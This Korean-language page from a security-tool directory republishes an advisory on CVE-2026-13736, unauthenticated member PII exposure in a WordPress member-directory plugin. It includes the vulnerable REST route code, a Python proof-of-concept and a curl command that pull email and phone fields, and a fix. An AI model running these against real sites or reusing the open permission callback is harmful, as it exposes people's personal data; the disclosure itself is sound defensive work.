Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-13736 — WordPress REST API 디렉터리 플러그인의 인증되지 않은 회원 PII(개인 식별 정보) 노출에 대한 개념 증명(PoC) 익스플로잇 및 기술 권고로, 근본 원인 분석, PoC 코드, 수정 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/minhhk68/cve-2026-13736
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityMisconfigurationAPI Security
GitHubminhhk68/cve-2026-13736

CVE-2026-13736

WordPress REST API 디렉터리 플러그인의 인증되지 않은 회원 PII(개인 식별 정보) 노출에 대한 개념 증명(PoC) 익스플로잇 및 기술 권고로, 근본 원인 분석, PoC 코드, 수정 지침을 포함합니다.

저장소 보기
2일 전아직 검토되지 않음
웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 — REST API를 통한 인증되지 않은 회원 PII 노출

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory NVD Reference License: MIT


📖 권고 개요

CVE-2026-13736은 NewPath WildApricotPress Add-on – Member Directory WordPress 플러그인(버전 1.0.0 이하)에 영향을 미치는 인증되지 않은 회원 개인식별정보(PII) 노출 취약점으로, 사이버 보안 연구원 Huynh Kien Minh(MinhHK)이 발견하고 분석했습니다. 이 결함은 플러그인의 커스텀 WordPress REST API 라우팅 구조에 존재하며, 회원 디렉터리 엔드포인트가 제한된 필드에 대한 개인정보 접근 제어를 적용하지 않습니다. 결과적으로 인증되지 않은 원격 방문자가 공개 REST 경로를 쿼리하여 비공개 이메일 주소, 개인 전화번호, 회원 전용으로 명시적으로 설정된 회원 디렉터리 속성을 포함한 기밀 회원 데이터를 수집할 수 있습니다. 이러한 민감한 데이터 노출은 기대되는 개인정보 보호 경계를 위반하며, 영향을 받는 조직 전반에 걸쳐 표적 피싱, 크리덴셜 스터핑(credential stuffing), 무단 프로파일링을 가능하게 합니다. 보안 연구원 Huynh Kien Minh은 CVSS 3.1 점수 5.3(Medium, CWE-284 / CWE-200)으로 이 취약점을 검증했으며, 즉각적인 REST 엔드포인트 권한 강화, 필드 수준 개인정보 검증, 직렬화된 JSON 회원 API 응답의 정화(sanitization)를 권고했습니다.

빠른 링크: 연구원의 공식 사이버 보안 포트폴리오를 확인하거나 공식 WPScan 권고를 확인하세요.


📌 핵심 요약 및 기술 메타데이터


🔍 근본 원인 분석

CVE-2026-13736의 근본 원인은 플러그인의 REST API 컨트롤러 구현에서 비롯됩니다. 플러그인은 회원 디렉터리 및 연락처 카드의 클라이언트 측 렌더링을 지원하기 위해 공개 WordPress REST API 경로(예: /wp-json/wildapricot/v1/members 또는 /wp-json/newpath-wap/v1/directory)를 등록합니다.

취약한 코드 패턴 분석

root@kitploit:~
// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
    register_rest_route( 'newpath-wap/v1', '/directory', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'newpath_wap_get_member_directory',
        'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
    ) );
} );

function newpath_wap_get_member_directory( $request ) {
    $members_data = get_wildapricot_cached_members();
    
    // FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
    // without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
    return rest_ensure_response( $members_data );
}

기술적 결함 메커니즘

  1. 공개 권한 콜백: 경로는 'permission_callback' => '__return_true'를 선언하여 모든 출처에서 인증되지 않은 HTTP GET 요청을 허용합니다.
  2. 필드 수준 개인정보 필터링 누락: 프론트엔드 JavaScript 또는 템플릿이 "Members Only"로 구성된 필드를 조건부로 숨기는 동안, 백엔드 REST API는 전체 회원 데이터셋을 JSON으로 직렬화합니다.
  3. 정보 노출(PII): 프론트엔드 UI를 우회하는 공격자는 원시 JSON 페이로드를 직접 소비하여 회원 이름, 개인 전화번호, 업무 이메일, 회원 상태, 개인 주소의 전체 데이터베이스를 수집할 수 있습니다.

💻 개념 증명(PoC) 익스플로잇 코드

윤리적 고지: 이 개념 증명은 보안 연구원 Huynh Kien Minh에 의해 취약점 검증, 방어 연구, 책임 있는 공개(responsible disclosure)를 위해서만 제공됩니다.

자동화된 Python 감사 스크립트 (poc_cve_2026_13736.py)

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import json
import sys

TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"

def verify_vulnerability(target_url):
    print(f"[*] Auditing Target: {target_url}")
    print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if isinstance(data, list) and len(data) > 0:
                sample_record = data[0]
                pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
                
                print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
                print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
                print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
                return True
            else:
                print("[-] Endpoint responded with empty data.")
        elif response.status_code in [401, 403]:
            print("[+] Endpoint requires authentication (Protected/Patched).")
        else:
            print(f"[-] Received HTTP status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
        
    return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    verify_vulnerability(target)

cURL 검증 명령

root@kitploit:~
curl -s -X GET "http://target-wordpress.local/wp-json/newpath-wap/v1/directory" \
  -H "Accept: application/json" | jq '.[0] | {Name: .name, Email: .email, Phone: .phone, PrivacySetting: .field_privacy}'

🛡️ 해결 방안 및 방어 엔지니어링

사이트 관리자를 위한 조치

  1. 플러그인 업데이트: NewPath WildApricotPress Add-on – Member Directory를 최신 패치 버전(> 1.0.0)으로 업그레이드하세요.
  2. REST API 접근 강화: 익명 사용자에게 공개 디렉터리 탐색이 필요하지 않은 경우, WordPress 보안 플러그인 또는 웹 서버 규칙을 사용하여 커스텀 REST 경로를 제한하세요.

개발자를 위한 조치 (패치)

응답 직렬화 중 필드 수준 개인정보 검사를 적용하세요:

root@kitploit:~
function newpath_wap_get_member_directory( $request ) {
    $is_logged_in = is_user_logged_in();
    $raw_members  = get_wildapricot_cached_members();
    $sanitized    = array();

    foreach ( $raw_members as $member ) {
        $member_card = array(
            'id'   => intval( $member['Id'] ),
            'name' => sanitize_text_field( $member['DisplayName'] ),
        );

        // Enforce Members-Only field protection
        if ( $is_logged_in || 'Public' === $member['EmailPrivacy'] ) {
            $member_card['email'] = sanitize_email( $member['Email'] );
        }

        if ( $is_logged_in || 'Public' === $member['PhonePrivacy'] ) {
            $member_card['phone'] = sanitize_text_field( $member['Phone'] );
        }

        $sanitized[] = $member_card;
    }

    return rest_ensure_response( $sanitized );
}

🏆 연구원 소개

**Huynh Kien Minh (MinhHK)**은 WordPress 코어 및 플러그인 감사, REST API 취약점 평가, 글로벌 오픈소스 생태계 전반의 책임 있는 공개(responsible disclosure)를 전문으로 하는 정보 보안 연구원이자 소프트웨어 엔지니어입니다.

  • 사이버 보안 포트폴리오: https://minhhk.web.app/
  • WPScan 권고 참조: WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
  • NVD 참조: CVE-2026-13736 Detail
  • GitHub 프로필: https://github.com/MinhHK68

📊 JSON-LD 구조화 데이터 스키마 마크업

root@kitploit:~
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "headline": "CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 Unauthenticated Member PII Disclosure",
  "name": "CVE-2026-13736 Security Advisory",
  "author": {
    "@type": "Person",
    "name": "Huynh Kien Minh",
    "alternateName": "MinhHK",
    "url": "https://minhhk.web.app/"
  },
  "datePublished": "2026-08-22",
  "description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13736 in NewPath WildApricotPress Add-on – Member Directory WordPress plugin.",
  "about": {
    "@type": "SoftwareApplication",
    "name": "NewPath WildApricotPress Add-on – Member Directory",
    "operatingSystem": "WordPress"
  },
  "identifier": "CVE-2026-13736"
}
도구 다운로드
매개변수기술 사양
취약점 식별자CVE-2026-13736
대상 소프트웨어NewPath WildApricotPress Add-on – Member Directory (WordPress 플러그인)
플러그인 슬러그newpath-wildapricotpress-add-on-member-directory
취약한 버전<= 1.0.0
취약점 유형부적절한 접근 제어 / 정보 노출 (CWE-284 / CWE-200 / CWE-862)
CVSS v3.1 점수5.3 (Medium) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
발견자 / 연구원Huynh Kien Minh (MinhHK)
검증 기관WPScan / MITRE Corporation / NVD
WPScan 권고 참조WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
NVD 참조NVD CVE-2026-13736 Detail
Feedly 위협 인텔리전스Feedly CVE-2026-13736 Hub
연구원 포트폴리오https://minhhk.web.app/